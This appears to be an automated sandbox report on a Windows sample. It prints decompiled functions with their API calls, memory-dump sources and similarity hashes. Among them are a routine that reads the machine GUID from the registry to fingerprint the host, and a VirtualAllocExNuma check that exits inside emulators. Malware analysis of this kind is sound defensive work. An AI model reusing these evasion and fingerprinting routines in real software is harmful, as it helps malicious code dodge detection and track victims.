                                        Function 29DA34D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 95%
                                        			E29DA34D0(void* __ebx, void* __edi, char* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				int _v524;
				void* _v528;
				signed int _t19;
				long _t23;
				intOrPtr* _t27;
				void* _t34;
				intOrPtr _t37;
				void* _t43;
				void* _t46;
				char* _t47;
				signed int _t48;

				_t47 = __esi;
				_t46 = __edi;
				_t34 = __ebx;
				_t19 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t19 ^ _t48;
				_v524 = 0;
				_v524 = 0xff;
				_v264 = 0;
				E29DB5640( &_v263, 0, 0xfe);
				_t23 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119,  &_v528); // executed
				if(_t23 == 0) {
					RegQueryValueExA(_v528, "MachineGuid", 0, 0,  &_v264,  &_v524); // executed
				}
				RegCloseKey(_v528);
				CharToOemA( &_v264,  &_v520);
				_t27 =  &_v520;
				 *((intOrPtr*)(_t47 + 0x14)) = 0xf;
				 *(_t47 + 0x10) = 0;
				 *_t47 = 0;
				_t43 = _t27 + 1;
				do {
					_t37 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t37 != 0);
				E29D892C0(_t47,  &_v520, _t27 - _t43);
				return E29DADF46(_t47, _t34, _v8 ^ _t48,  &_v520, _t46, _t47);
			}


















                                        0x29da34d0
                                        0x29da34d0
                                        0x29da34d0
                                        0x29da34d9
                                        0x29da34e0
                                        0x29da34ee
                                        0x29da34fb
                                        0x29da3505
                                        0x29da350c
                                        0x29da352c
                                        0x29da3534
                                        0x29da3554
                                        0x29da3554
                                        0x29da3561
                                        0x29da3575
                                        0x29da357b
                                        0x29da3581
                                        0x29da3588
                                        0x29da358f
                                        0x29da3592
                                        0x29da3595
                                        0x29da3595
                                        0x29da3597
                                        0x29da3598
                                        0x29da35a8
                                        0x29da35bc

                                        APIs
                                        • _memset.LIBCMT ref: 29DA350C
                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 29DA352C
                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 29DA3554
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3561
                                        • CharToOemA.USER32(00000000,?), ref: 29DA3575
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CharCloseOpenQueryValue_memset
                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                        • API String ID: 2235053359-1211650757
                                        • Opcode ID: ecc9d4ef5eb47435f21d4cc9fb616d98ca363a77510968592e6673e6bd0667b2
                                        • Instruction ID: 9d142827abfc315d94cc87020d989bbe5a2b1ac2cee004b8397fe9c604a76fc7
                                        • Opcode Fuzzy Hash: ecc9d4ef5eb47435f21d4cc9fb616d98ca363a77510968592e6673e6bd0667b2
                                        • Instruction Fuzzy Hash: 2021D4B1500319ABD720DF54CC48FDAB7B8AF54704F1081DCE55997182DBB4AB899FA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D81060 Relevance: 9.1, APIs: 6, Instructions: 51memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2020 29d81060-29d8107f GetCurrentProcess VirtualAllocExNuma 2021 29d81088 VirtualAlloc 2020->2021 2022 29d81081-29d81082 ExitProcess 2020->2022 2024 29d8101e-29d81021 2021->2024 2025 29d81023-29d81029 2021->2025 2024->2025 2026 29d8102b-29d81050 call 29db5640 VirtualFree 2025->2026 2027 29d81056-29d81058 2025->2027 2026->2027
                                        C-Code - Quality: 35%
                                        			E29D81060(void* __ecx) {
				void* _t1;
				void* _t2;
				int _t4;
				void* _t11;

				_t1 = GetCurrentProcess();
				__imp__VirtualAllocExNuma(_t1, 0, 0x7d0, 0x3000, 0x40, 0); // executed
				if(_t1 == 0) {
					ExitProcess(__eax);
				}
				_t2 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
				_t11 = _t2;
				_push(_t2);
				if(_t2 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t4);
				if(_t11 != 0) {
					E29DB5640(_t11, 0, 0x5e69ec0);
					_push(_t6);
					asm("cld");
					_t4 = VirtualFree(_t11, 0x17c841c0, 0x8000);
				}
				return _t4;
			}







                                        0x29d81070
                                        0x29d81077
                                        0x29d8107f
                                        0x29d81082
                                        0x29d81082
                                        0x29d81010
                                        0x29d81016
                                        0x29d81018
                                        0x29d8101c
                                        0x29d81020
                                        0x29d81021
                                        0x29d81025
                                        0x29d81026
                                        0x29d81029
                                        0x29d81036
                                        0x29d8103e
                                        0x29d81043
                                        0x29d81050
                                        0x29d81050
                                        0x29d81058

                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004), ref: 29D81010
                                        • _memset.LIBCMT ref: 29D81036
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 29D81050
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 29D81070
                                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 29D81077
                                        • ExitProcess.KERNEL32 ref: 29D81082
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                        • String ID:
                                        • API String ID: 1859398019-0
                                        • Opcode ID: 58c99733f2270c4e6ceaa300fd9e879174c20a10f3a397532cff4eaf8dff35d5
                                        • Instruction ID: 72fc070472e54d653c2df3781ce23471e360f370c8c07ab24f8427293d55a218
                                        • Opcode Fuzzy Hash: 58c99733f2270c4e6ceaa300fd9e879174c20a10f3a397532cff4eaf8dff35d5
                                        • Instruction Fuzzy Hash: 42F09671B8A36177E21526602D1EF9B565C7F02F92F205004F745FA1C1D658950A75E8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DAE70E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2030 29dae70e-29dae716 2031 29dae725-29dae730 call 29dadfe0 2030->2031 2034 29dae718-29dae723 call 29db35ce 2031->2034 2035 29dae732-29dae733 2031->2035 2034->2031 2038 29dae734-29dae745 2034->2038 2039 29dae773-29dae78d call 29dae1a8 call 29daff06 2038->2039 2040 29dae747-29dae772 call 29dae074 call 29daed61 2038->2040 2040->2039
                                        C-Code - Quality: 93%
                                        			E29DAE70E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char* _v8;
				signed int _v16;
				char _v20;
				void* __ebp;
				void* _t34;
				signed int _t35;
				signed int _t39;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t51;
				intOrPtr* _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t66;
				intOrPtr* _t68;

				_t66 = __esi;
				_t64 = __edi;
				_t63 = __edx;
				_t51 = __ebx;
				while(1) {
					_t34 = E29DADFE0(_t63, _t64, _t66, _a4); // executed
					if(_t34 != 0) {
						return _t34;
					}
					_t35 = E29DB35CE(_t34, _a4);
					__eflags = _t35;
					if(_t35 == 0) {
						__eflags =  *0x29dd6cdc & 0x00000001;
						if(( *0x29dd6cdc & 0x00000001) == 0) {
							 *0x29dd6cdc =  *0x29dd6cdc | 0x00000001;
							__eflags =  *0x29dd6cdc;
							_push(1);
							_v8 = "bad allocation";
							E29DAE074(0x29dd6cd0,  &_v8);
							 *0x29dd6cd0 = 0x29dc52ac;
							E29DAED61( *0x29dd6cdc, 0x29dc4581);
						}
						_t54 =  &_v20;
						E29DAE1A8(_t54, 0x29dd6cd0);
						_v20 = 0x29dc52ac;
						E29DAFF06( &_v20, 0x29dd2028);
						asm("int3");
						_t39 = _v16;
						_push(0x29dc52ac);
						_t68 = _t54;
						 *((char*)(_t68 + 0xc)) = 0;
						__eflags = _t39;
						if(__eflags != 0) {
							 *_t68 =  *_t39;
							_t32 = _t39 + 4; // 0x29d84fc0
							 *((intOrPtr*)(_t68 + 4)) =  *_t32;
						} else {
							_t42 = E29DB524B(_t51, _t63, __eflags);
							 *((intOrPtr*)(_t68 + 8)) = _t42;
							 *_t68 =  *((intOrPtr*)(_t42 + 0x6c));
							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t42 + 0x68));
							__eflags =  *_t68 -  *0x29dd5de0; // 0x2bab2e28
							if(__eflags != 0) {
								_t60 =  *0x29dd5b98; // 0xfffffffe
								__eflags =  *(_t42 + 0x70) & _t60;
								if(__eflags == 0) {
									 *_t68 = E29DB5022(_t51, _t63, 0x29dd6cd0, _t68, __eflags);
								}
							}
							__eflags =  *((intOrPtr*)(_t68 + 4)) -  *0x29dd5aa0; // 0x2bab1678
							if(__eflags != 0) {
								_t59 =  *0x29dd5b98; // 0xfffffffe
								__eflags =  *( *((intOrPtr*)(_t68 + 8)) + 0x70) & _t59;
								if(__eflags == 0) {
									 *((intOrPtr*)(_t68 + 4)) = E29DB48A1(_t51, _t63, 0x29dd6cd0, _t68, __eflags);
								}
							}
							_t44 =  *((intOrPtr*)(_t68 + 8));
							__eflags =  *(_t44 + 0x70) & 0x00000002;
							if(( *(_t44 + 0x70) & 0x00000002) == 0) {
								 *(_t44 + 0x70) =  *(_t44 + 0x70) | 0x00000002;
								 *((char*)(_t68 + 0xc)) = 1;
							}
						}
						return _t68;
					} else {
						continue;
					}
					break;
				}
			}




















                                        0x29dae70e
                                        0x29dae70e
                                        0x29dae70e
                                        0x29dae70e
                                        0x29dae725
                                        0x29dae728
                                        0x29dae730
                                        0x29dae733
                                        0x29dae733
                                        0x29dae71b
                                        0x29dae721
                                        0x29dae723
                                        0x29dae734
                                        0x29dae745
                                        0x29dae747
                                        0x29dae747
                                        0x29dae74e
                                        0x29dae756
                                        0x29dae75d
                                        0x29dae767
                                        0x29dae76d
                                        0x29dae772
                                        0x29dae774
                                        0x29dae777
                                        0x29dae785
                                        0x29dae788
                                        0x29dae78d
                                        0x29dae793
                                        0x29dae796
                                        0x29dae797
                                        0x29dae799
                                        0x29dae79d
                                        0x29dae79f
                                        0x29dae806
                                        0x29dae808
                                        0x29dae80b
                                        0x29dae7a1
                                        0x29dae7a1
                                        0x29dae7a6
                                        0x29dae7ac
                                        0x29dae7b1
                                        0x29dae7b6
                                        0x29dae7bc
                                        0x29dae7be
                                        0x29dae7c4
                                        0x29dae7c7
                                        0x29dae7ce
                                        0x29dae7ce
                                        0x29dae7c7
                                        0x29dae7d3
                                        0x29dae7d9
                                        0x29dae7de
                                        0x29dae7e4
                                        0x29dae7e7
                                        0x29dae7ee
                                        0x29dae7ee
                                        0x29dae7e7
                                        0x29dae7f1
                                        0x29dae7f4
                                        0x29dae7f8
                                        0x29dae7fa
                                        0x29dae7fe
                                        0x29dae7fe
                                        0x29dae7f8
                                        0x29dae812
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dae723

                                        APIs
                                        • _malloc.LIBCMT ref: 29DAE728
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • std::exception::exception.LIBCMT ref: 29DAE75D
                                        • std::exception::exception.LIBCMT ref: 29DAE777
                                        • __CxxThrowException@8.LIBCMT ref: 29DAE788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                        • String ID: )
                                        • API String ID: 615853336-2427484129
                                        • Opcode ID: db83cdc9f450082ef231d4f0bf568fa6881e7466abe1a6c7cebb74f9d62ff989
                                        • Instruction ID: c5939900f600fbaf5c91224838db69a72660eddba28b4d444799e7ca4d8bbe7e
                                        • Opcode Fuzzy Hash: db83cdc9f450082ef231d4f0bf568fa6881e7466abe1a6c7cebb74f9d62ff989
                                        • Instruction Fuzzy Hash: 44F0F43A4001297ADB08AB69C844A5D7AA8EF70214F50841DE440AA990DF719A17FBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D923B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2049 29d923b0-29d92465 call 29d892c0 call 29d894c0 call 29d91560 call 29d891d0 2058 29d92473-29d92486 2049->2058 2059 29d92467-29d92470 call 29dadf3b 2049->2059 2061 29d92488 2058->2061 2062 29d9248b-29d92499 StrCmpCA 2058->2062 2059->2058 2061->2062 2064 29d9249b-29d924a1 2062->2064 2065 29d9250d-29d9250f 2062->2065 2066 29d924a3 2064->2066 2067 29d924a6-29d924b9 call 29d95240 2064->2067 2068 29d92514-29d92527 call 29d892c0 2065->2068 2066->2067 2073 29d924e8 2067->2073 2074 29d924bb-29d924ce call 29d896c0 2067->2074 2075 29d92529 2068->2075 2076 29d9252c-29d92531 2068->2076 2077 29d924eb-29d924f5 lstrlenA 2073->2077 2090 29d924d0 2074->2090 2091 29d924d3-29d924e6 call 29daea8e 2074->2091 2075->2076 2079 29d9253f-29d92550 2076->2079 2080 29d92533-29d9253c call 29dadf3b 2076->2080 2077->2065 2083 29d924f7-29d924fc 2077->2083 2081 29d9255e-29d9256a 2079->2081 2082 29d92552-29d9255b call 29dadf3b 2079->2082 2080->2079 2087 29d92578-29d92593 call 29dadf46 2081->2087 2088 29d9256c-29d92575 call 29dadf3b 2081->2088 2082->2081 2089 29d92500-29d92505 2083->2089 2088->2087 2089->2089 2096 29d92507-29d9250b 2089->2096 2090->2091 2091->2077 2096->2068
                                        C-Code - Quality: 30%
                                        			E29D923B0(void* __eflags, intOrPtr _a4, char _a8, char* _a24, intOrPtr _a28, char _a36, intOrPtr _a56, intOrPtr _a64) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				CHAR* _v32;
				char* _v48;
				intOrPtr _v56;
				CHAR* _v60;
				char _v76;
				CHAR* _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				signed int _t67;
				void* _t73;
				char** _t75;
				char* _t78;
				char* _t81;
				CHAR* _t86;
				char** _t90;
				CHAR* _t91;
				intOrPtr _t95;
				char* _t96;
				intOrPtr* _t97;
				char _t104;
				intOrPtr _t112;
				intOrPtr _t117;
				CHAR* _t118;
				signed int _t119;
				void* _t120;
				char* _t122;
				intOrPtr* _t123;
				void* _t124;
				void* _t126;

				_t126 = __eflags;
				_push(0xffffffff);
				_push(E29DC2C68);
				_push( *[fs:0x0]);
				_t66 =  *0x29dd5664; // 0xd9555f04
				_t67 = _t66 ^ _t119;
				_v20 = _t67;
				_push(_t67);
				 *[fs:0x0] =  &_v16;
				_v88 = _a64;
				_v8 = 0;
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				_v8 = 2;
				_t122 = _t120 - 0x34;
				_t96 = _t122;
				_v92 = _t122;
				_v84 = 0;
				 *((intOrPtr*)(_t96 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t96 + 0x10)) = 0;
				_v80 = 0;
				 *_t96 = 0;
				E29D892C0(_t96, 0x29dcd617, 0);
				_push(1);
				_t123 = _t122 - 0x1c;
				_t97 = _t123;
				_v96 = _t123;
				_v8 = 3;
				_t108 =  &_a36;
				 *((intOrPtr*)(_t97 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t97 + 0x10)) = 0;
				 *_t97 = 0;
				E29D894C0(_t97,  &_a36, 0, 0xffffffff);
				_push( &_v76);
				_v8 = 2;
				_t73 = E29D91560(_t126); // executed
				_t124 = _t123 + 0x40;
				_v8 = 4;
				E29D891D0(_t73,  &_v48);
				_v8 = 2;
				if(_v56 >= 0x10) {
					_push(_v76);
					E29DADF3B();
					_t124 = _t124 + 4;
				}
				_t75 = _v48;
				_v56 = 0xf;
				_v60 = 0;
				_v76 = 0;
				if(_v28 < 0x10) {
					_t75 =  &_v48;
				}
				_push("ERROR");
				_push(_t75);
				if( *0x29dd8550() == 0) {
					L16:
					_push(5);
					_push("ERROR");
				} else {
					_t81 = _a8;
					if(_a28 < 0x10) {
						_t81 =  &_a8;
					}
					_t108 = _a24;
					if(E29D95240(0,  &_v48, _t81, _a24) == 0xffffffff) {
						_t118 = _v80;
					} else {
						E29D896C0( &_v48, 0, _t84 + _a4);
						_t90 = _v48;
						if(_v28 < 0x10) {
							_t90 =  &_v48;
						}
						_t108 =  &_v84;
						_t91 = E29DAEA8E(0,  &_v84, 0x10, _t90, _v88,  &_v84);
						_t124 = _t124 + 0xc;
						_t118 = _t91;
					}
					if(lstrlenA(_t118) < 1) {
						goto L16;
					} else {
						_t86 = _t118;
						_t108 =  &(_t86[1]);
						do {
							_t104 =  *_t86;
							_t86 =  &(_t86[1]);
						} while (_t104 != 0);
						_push(_t86 - _t108);
						_push(_t118);
					}
				}
				E29D892C0(0x29dd62cc);
				_t78 = _v48;
				_v32 = 0;
				if(_v28 < 0x10) {
					_t78 =  &_v48;
				}
				 *_t78 = 0;
				if(_v28 >= 0x10) {
					_t108 = _v48;
					_push(_v48);
					_t78 = E29DADF3B();
					_t124 = _t124 + 4;
				}
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				if(_a28 >= 0x10) {
					_push(_a8);
					_t78 = E29DADF3B();
					_t124 = _t124 + 4;
				}
				_a28 = 0xf;
				_a24 = 0;
				_a8 = 0;
				if(_a56 >= 0x10) {
					_push(_a36);
					_t78 = E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t112);
				_pop(_t117);
				_pop(_t95);
				return E29DADF46(_t78, _t95, _v20 ^ _t119, _t108, _t112, _t117);
			}










































                                        0x29d923b0
                                        0x29d923b3
                                        0x29d923b5
                                        0x29d923c0
                                        0x29d923c4
                                        0x29d923c9
                                        0x29d923cb
                                        0x29d923d1
                                        0x29d923d5
                                        0x29d923de
                                        0x29d923e3
                                        0x29d923eb
                                        0x29d923ee
                                        0x29d923f1
                                        0x29d923f4
                                        0x29d923f8
                                        0x29d923fb
                                        0x29d923fd
                                        0x29d92400
                                        0x29d92404
                                        0x29d92407
                                        0x29d9240f
                                        0x29d92412
                                        0x29d92414
                                        0x29d92419
                                        0x29d9241b
                                        0x29d9241e
                                        0x29d92420
                                        0x29d92425
                                        0x29d9242a
                                        0x29d9242d
                                        0x29d92430
                                        0x29d92434
                                        0x29d92436
                                        0x29d9243e
                                        0x29d9243f
                                        0x29d92443
                                        0x29d92448
                                        0x29d92450
                                        0x29d92454
                                        0x29d9245e
                                        0x29d92465
                                        0x29d9246a
                                        0x29d9246b
                                        0x29d92470
                                        0x29d92470
                                        0x29d92473
                                        0x29d92476
                                        0x29d9247d
                                        0x29d92480
                                        0x29d92486
                                        0x29d92488
                                        0x29d92488
                                        0x29d9248b
                                        0x29d92490
                                        0x29d92499
                                        0x29d9250d
                                        0x29d9250d
                                        0x29d9250f
                                        0x29d9249b
                                        0x29d9249b
                                        0x29d924a1
                                        0x29d924a3
                                        0x29d924a3
                                        0x29d924a6
                                        0x29d924b9
                                        0x29d924e8
                                        0x29d924bb
                                        0x29d924c3
                                        0x29d924c8
                                        0x29d924ce
                                        0x29d924d0
                                        0x29d924d0
                                        0x29d924d6
                                        0x29d924dc
                                        0x29d924e1
                                        0x29d924e4
                                        0x29d924e4
                                        0x29d924f5
                                        0x00000000
                                        0x29d924f7
                                        0x29d924f7
                                        0x29d924f9
                                        0x29d92500
                                        0x29d92500
                                        0x29d92502
                                        0x29d92503
                                        0x29d92509
                                        0x29d9250a
                                        0x29d9250a
                                        0x29d924f5
                                        0x29d92519
                                        0x29d9251e
                                        0x29d92521
                                        0x29d92527
                                        0x29d92529
                                        0x29d92529
                                        0x29d9252c
                                        0x29d92531
                                        0x29d92533
                                        0x29d92536
                                        0x29d92537
                                        0x29d9253c
                                        0x29d9253c
                                        0x29d92544
                                        0x29d92547
                                        0x29d9254a
                                        0x29d92550
                                        0x29d92555
                                        0x29d92556
                                        0x29d9255b
                                        0x29d9255b
                                        0x29d9255e
                                        0x29d92561
                                        0x29d92564
                                        0x29d9256a
                                        0x29d9256f
                                        0x29d92570
                                        0x29d92575
                                        0x29d9257b
                                        0x29d92583
                                        0x29d92584
                                        0x29d92585
                                        0x29d92593

                                        APIs
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                          • Part of subcall function 29D891D0: _memmove.LIBCMT ref: 29D89203
                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 29D92491
                                        • _strtok_s.LIBCMT ref: 29D924DC
                                        • lstrlenA.KERNEL32(?,?,?,?), ref: 29D924EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argument_memmove_strtok_slstrlenstd::_
                                        • String ID: ERROR
                                        • API String ID: 2316618217-2861137601
                                        • Opcode ID: 9e1a07ec305cc2b3585fb540468361619044725bf63b2f53b4a180414a53283c
                                        • Instruction ID: e1b514fa25b03b88ae4c7740beee14e5add2ab9d67c537022aeaad14d5212bd6
                                        • Opcode Fuzzy Hash: 9e1a07ec305cc2b3585fb540468361619044725bf63b2f53b4a180414a53283c
                                        • Instruction Fuzzy Hash: 3061B2B1C10248EFDF01DFA8C885ADEBBB8EF18310F10816EE515AB641D7349A06DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D89750 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2101 29d89750-29d8978b 2102 29d8978d-29d8978f 2101->2102 2103 29d89791-29d897a3 2101->2103 2104 29d897b8-29d897c2 2102->2104 2103->2104 2105 29d897a5-29d897b1 2103->2105 2107 29d897c4-29d897c7 2104->2107 2108 29d897d6-29d897d9 2104->2108 2105->2104 2106 29d897b3 2105->2106 2106->2104 2110 29d897c9-29d897ca call 29dae70e 2107->2110 2111 29d897db-29d89825 call 29dae0fc call 29daff06 call 29d898c0 2107->2111 2109 29d8982c-29d89831 2108->2109 2112 29d8984d-29d89851 2109->2112 2113 29d89833-29d89837 2109->2113 2121 29d897cf-29d897d4 2110->2121 2111->2109 2119 29d8985e-29d8986f 2112->2119 2120 29d89853-29d8985b call 29dadf3b 2112->2120 2116 29d89839-29d8983b 2113->2116 2117 29d8983d 2113->2117 2122 29d8983f-29d8984a call 29db0010 2116->2122 2117->2122 2125 29d89871 2119->2125 2126 29d89873-29d89888 2119->2126 2120->2119 2121->2108 2121->2111 2122->2112 2125->2126
                                        C-Code - Quality: 69%
                                        			E29D89750(intOrPtr* __ecx, signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				char _v28;
				signed int _v32;
				char _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				intOrPtr* _t44;
				unsigned int _t55;
				intOrPtr _t56;
				unsigned int _t60;
				void* _t61;
				intOrPtr* _t73;
				signed int _t77;
				signed int _t82;
				intOrPtr _t83;

				_push(0xffffffff);
				_push(E29DC1D80);
				_push( *[fs:0x0]);
				_t83 = _t82 - 0x1c;
				_push(_t55);
				_t35 =  *0x29dd5664; // 0xd9555f04
				_push(_t35 ^ _t82);
				 *[fs:0x0] =  &_v16;
				_v20 = _t83;
				_t73 = __ecx;
				_v24 = __ecx;
				_t38 = _a4;
				_t77 = _t38 | 0x0000000f;
				if(_t77 <= 0xfffffffe) {
					_t55 =  *(__ecx + 0x14);
					_t60 = _t55 >> 1;
					_t69 = 0xaaaaaaab * _t77 >> 0x20 >> 1;
					__eflags = _t60 - 0xaaaaaaab * _t77 >> 0x20 >> 1;
					if(__eflags > 0) {
						_t77 = _t60 + _t55;
						__eflags = _t55 - 0xfffffffe - _t60;
						if(__eflags > 0) {
							_t77 = 0xfffffffe;
						}
					}
				} else {
					_t77 = _t38;
				}
				_t41 = 0;
				_t11 = _t77 + 1; // 0xffffffff
				_t61 = _t11;
				_v8 = 0;
				if(_t61 <= 0) {
					L8:
					_a4 = _t41;
					_t56 = _a8;
					if(_t56 != 0) {
						if( *(_t73 + 0x14) < 0x10) {
							_t44 = _t73;
						} else {
							_t44 =  *_t73;
						}
						E29DB0010(_a4, _t44, _t56);
						_t83 = _t83 + 0xc;
					}
					if( *(_t73 + 0x14) >= 0x10) {
						_push( *_t73);
						E29DADF3B();
					}
					_t42 = _a4;
					 *_t73 = 0;
					 *_t73 = _t42;
					 *(_t73 + 0x14) = _t77;
					 *((intOrPtr*)(_t73 + 0x10)) = _t56;
					if(_t77 >= 0x10) {
						_t73 = _t42;
					}
					 *((char*)(_t73 + _t56)) = 0;
					 *[fs:0x0] = _v16;
					return _t42;
				} else {
					_t88 = _t61 - 0xffffffff;
					if(_t61 > 0xffffffff) {
						L9:
						_v28 = 0;
						E29DAE0FC( &_v44,  &_v28);
						_v44 = 0x29dc52ac;
						E29DAFF06( &_v44, 0x29dd2028);
						_v32 = _a4;
						_v20 = _t83;
						__eflags = _v24 + 0x18;
						_v8 = 2;
						_a4 = E29D898C0(_t73, _t77, _a4 + 1);
						return E29D89826;
					} else {
						_t41 = E29DAE70E(_t55, _t69, _t73, _t77, _t88, _t61); // executed
						_t83 = _t83 + 4;
						if(0 == 0) {
							goto L9;
						} else {
							goto L8;
						}
					}
				}
			}


























                                        0x29d89753
                                        0x29d89755
                                        0x29d89760
                                        0x29d89761
                                        0x29d89764
                                        0x29d89767
                                        0x29d8976e
                                        0x29d89772
                                        0x29d89778
                                        0x29d8977b
                                        0x29d8977d
                                        0x29d89780
                                        0x29d89785
                                        0x29d8978b
                                        0x29d89791
                                        0x29d8979d
                                        0x29d8979f
                                        0x29d897a1
                                        0x29d897a3
                                        0x29d897ac
                                        0x29d897af
                                        0x29d897b1
                                        0x29d897b3
                                        0x29d897b3
                                        0x29d897b1
                                        0x29d8978d
                                        0x29d8978d
                                        0x29d8978d
                                        0x29d897b8
                                        0x29d897ba
                                        0x29d897ba
                                        0x29d897bd
                                        0x29d897c2
                                        0x29d897d6
                                        0x29d897d6
                                        0x29d8982c
                                        0x29d89831
                                        0x29d89837
                                        0x29d8983d
                                        0x29d89839
                                        0x29d89839
                                        0x29d89839
                                        0x29d89845
                                        0x29d8984a
                                        0x29d8984a
                                        0x29d89851
                                        0x29d89855
                                        0x29d89856
                                        0x29d8985b
                                        0x29d8985e
                                        0x29d89861
                                        0x29d89864
                                        0x29d89866
                                        0x29d89869
                                        0x29d8986f
                                        0x29d89871
                                        0x29d89871
                                        0x29d89873
                                        0x29d8987a
                                        0x29d89888
                                        0x29d897c4
                                        0x29d897c4
                                        0x29d897c7
                                        0x29d897db
                                        0x29d897e2
                                        0x29d897e9
                                        0x29d897f7
                                        0x29d897fe
                                        0x29d89809
                                        0x29d8980d
                                        0x29d89811
                                        0x29d89814
                                        0x29d8981d
                                        0x29d89825
                                        0x29d897c9
                                        0x29d897ca
                                        0x29d897cf
                                        0x29d897d4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d897d4
                                        0x29d897c7

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D897E9
                                          • Part of subcall function 29DAE0FC: std::exception::_Copy_str.LIBCMT ref: 29DAE117
                                        • __CxxThrowException@8.LIBCMT ref: 29D897FE
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                          • Part of subcall function 29D898C0: std::exception::exception.LIBCMT ref: 29D898EF
                                          • Part of subcall function 29D898C0: __CxxThrowException@8.LIBCMT ref: 29D89904
                                        • _memmove.LIBCMT ref: 29D89845
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
